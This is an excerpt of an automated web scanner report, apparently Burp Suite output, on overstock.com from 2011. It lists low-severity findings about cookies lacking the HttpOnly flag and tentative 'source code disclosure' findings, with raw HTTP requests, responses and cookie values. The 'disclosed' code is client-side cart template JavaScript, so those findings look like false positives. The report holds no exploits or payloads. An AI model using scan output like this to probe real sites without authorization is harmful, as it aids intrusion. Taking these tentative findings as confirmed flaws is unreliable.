Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

3.18. http://www.overstock.com/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /community

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:39 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:39 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:39 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124038


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- end SITE-DOCYTPE -->
<html>
<head>

<!--Page-specific title and meta data-->
<title>Overstock.com
...[SNIP]...

3.19. http://www.overstock.com/intlcountryselect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /intlcountryselect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intlcountryselect HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:41 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clubogiftcards=; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 180841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.co
...[SNIP]...

3.20. http://www.overstock.com/myrecommendations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /myrecommendations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myrecommendations HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:39 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:39 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:39 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 46411


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->
<html>
<head>
<!--Page-specific
...[SNIP]...

3.21. http://www.overstock.com/shipping-information/11971/static.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /shipping-information/11971/static.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shipping-information/11971/static.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:41 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 1108421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->

<!--Page-specific title and meta data-->
<title>Shippin
...[SNIP]...

4. Source code disclosure  previous  next
There are 20 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


4.1. http://www.overstock.com/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET / HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; mxclastvisit=20110203

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:15:12 GMT
Server: Apache
Set-Cookie: SSLB=A; path=/; domain=www.overstock.com
Set-Cookie: SSID=AwAXDSkAAAAAELJWTQxpBgUQslZNAQAQslZNAAAAAAAAAAAQslZNAQDsAAAAhg4AAAI; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:15:12 GMT
Set-Cookie: SSSC=2.G5572837370791094540.1.236.3718; path=/; domain=www.overstock.com
Set-Cookie: SSRT=ELJWTQE; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:15:12 GMT
Vary: Cookie,Accept-Encoding,User-Agent
Expires: Thu, 20 May 2010 20:51:00 GMT
Pragma: no-cache
Encoding: iso-8859-1
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: se_list=se_list^0|4|; Domain=.overstock.com; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527312838|csbshow^0|mxcshopmore^http://www.overstock.com/; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1297527312839; Domain=.overstock.com; Path=/
Set-Cookie: clubogiftcards=clubogctotal^0.00; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:15:12 GMT; Path=/
Sitespect: true
Content-Length: 89639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- end SITE-DOCYTPE -->
<html>
   <head>
<!-- // --><script language='javascript' type='text/ja
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...

4.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:31:46 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:31:46 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:46 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:46 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 132816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
